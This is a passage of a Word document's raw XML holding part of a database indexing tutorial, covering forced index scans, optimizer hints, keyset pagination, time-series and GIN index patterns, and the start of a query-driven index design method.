        <w:t>Collects all matching row physical locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686D8D4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1492"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Sorts them by page number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3904F2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1492"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Fetches heap pages in sequential order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7FA024" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>This converts random I/O into nearly sequential I/O — dramatic improvement when many rows match across many pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372F51F5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conditional Index Selection — Forcing Index Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67E56B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When the planner makes wrong choices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9034E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71607B1C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Force index scan (PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5FCEB8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SET enable_seqscan = off;  -- disables seq scan (use carefully, session-only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A31E5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM large_table WHERE indexed_col = 'value';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A92236" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3A9273EB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Investigate why planner avoids index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F75D36B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Low selectivity? Many matching rows?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063C6992" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Stale statistics?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AAB445" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Wrong random_page_cost setting?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD297AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="4311B52B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- MySQL: USE INDEX hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19600D10" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM orders USE INDEX (idx_customer_id) WHERE customer_id = 123;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E1DB82" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The optimizer hint debate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AEC2A6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Forcing index usage via hints hardcodes a plan that may be wrong for other parameter values or data distributions. As data changes, a forced index may become suboptimal. Best practice: fix the underlying reason the optimizer makes wrong choices (update statistics, adjust cost parameters, improve the index) rather than forcing specific plans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466E2B87" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Index Strategies for Common Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B88AFFD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The pagination pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D43D80" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A482102" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Naive pagination (performance degrades with large offsets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C270479" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM orders ORDER BY created_at DESC LIMIT 20 OFFSET 10000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE35904" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Must scan and discard 10,000 rows before returning 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDADE18" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6A873148" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Keyset pagination (cursor-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7A8CF1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>-- First page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7DE811" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM orders ORDER BY created_at DESC, id DESC LIMIT 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283CD14F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Returns rows with created_at between T1 and T2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4036845D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="0680B443" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Next page (using last row's created_at and id as cursor):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129024F7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT * FROM orders </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6DB2B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WHERE (created_at, id) &lt; ('2024-01-15 10:30:00', 12345)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3972C661" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">ORDER BY created_at DESC, id DESC </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03315534" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>LIMIT 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169E56D4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="5375B991" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index for keyset pagination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665CC325" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  CREATE INDEX ON orders(created_at DESC, id DESC);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB7499F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Each page starts at exactly the cursor position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059010D0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → O(log N + 20) I/O regardless of page number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E1A9F2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → 10,000th page costs same as 1st page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26416D1A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The time-series query pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37033D2A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124E4003" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Table: sensor_readings(sensor_id, recorded_at, value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA7F11" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Common queries: recent readings per sensor, readings in time range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE9900F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7D4863F7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Wrong index for range queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2FF6BC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON sensor_readings(sensor_id, value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14197BD1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Requires scanning all sensor_id entries for a time range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AFBB85" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="60B9B8CD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Correct index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3885B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON sensor_readings(sensor_id, recorded_at DESC);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC2FCE0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>-- Query: latest 100 readings for sensor 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6BF3D7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT * FROM sensor_readings </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B767079" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">WHERE sensor_id = 42 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C5A50E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">ORDER BY recorded_at DESC </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59CE6C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>LIMIT 100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7650D1E2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Uses index: sensor_id equality narrows to one "stripe" of the index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1590C457" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- recorded_at DESC allows forward scan (leaf links) for most recent first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC8ED2F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="50400B06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Covering index for common projection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F3D533" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON sensor_readings(sensor_id, recorded_at DESC) INCLUDE (value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C46CE34" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Query satisfied from index alone (sensor_id + recorded_at + value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4361A870" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Zero heap access for this query pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14879ACB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The many-to-many relationship pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314A29E0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05353ED6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Table: user_tags(user_id, tag_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B83DA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Common queries: users with all of {tag_A, tag_B, tag_C}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45222C6C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="4B0F15A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Standard indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBDBEFF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON user_tags(user_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654F9A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON user_tags(tag_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F969C8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1F5C04C3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Intersection approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282F5DEB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Find users with tag_A: fetch posting list for tag_A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C32D93D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Find users with tag_B: fetch posting list for tag_B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C4BCF9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Intersect → users with both tags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67925EB1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Cost: O(|tag_A_users| + |tag_B_users|) for intersection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75479C04" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="57393EFC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- GIN index for array column (denormalized approach):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A323B5D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ALTER TABLE users ADD COLUMN tag_ids INTEGER[];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041C3542" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON users USING GIN(tag_ids);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4933C99E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="62CA856B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Query: users with ALL of tag 1, 2, 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6D3D9B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM users WHERE tag_ids @&gt; ARRAY[1, 2, 3];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE10DB9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- GIN: intersect posting lists for tags 1, 2, 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D81E57" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Cost: O(posting_list_intersection) — often better for sparse tag distributions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4910C8EB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="3E160931">
          <v:rect id="_x0000_i5430" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F8CCFE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Index Design Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADCFC26" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Query-Driven Index Design Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC20969" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1 — Identify query patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EFBF2F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38865733" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>For each query in the workload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CC1360" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - What columns appear in WHERE clauses?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7410072A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Are conditions equality (=) or range (&lt;, &gt;, BETWEEN)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFC66D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - What columns appear in ORDER BY?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C1A49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - What columns appear in SELECT (potential covering index columns)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A968CA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - What is the estimated frequency? (critical for prioritization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B25FA67" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - What is the acceptable latency target?</w:t>
      </w:r>
    </w:p>
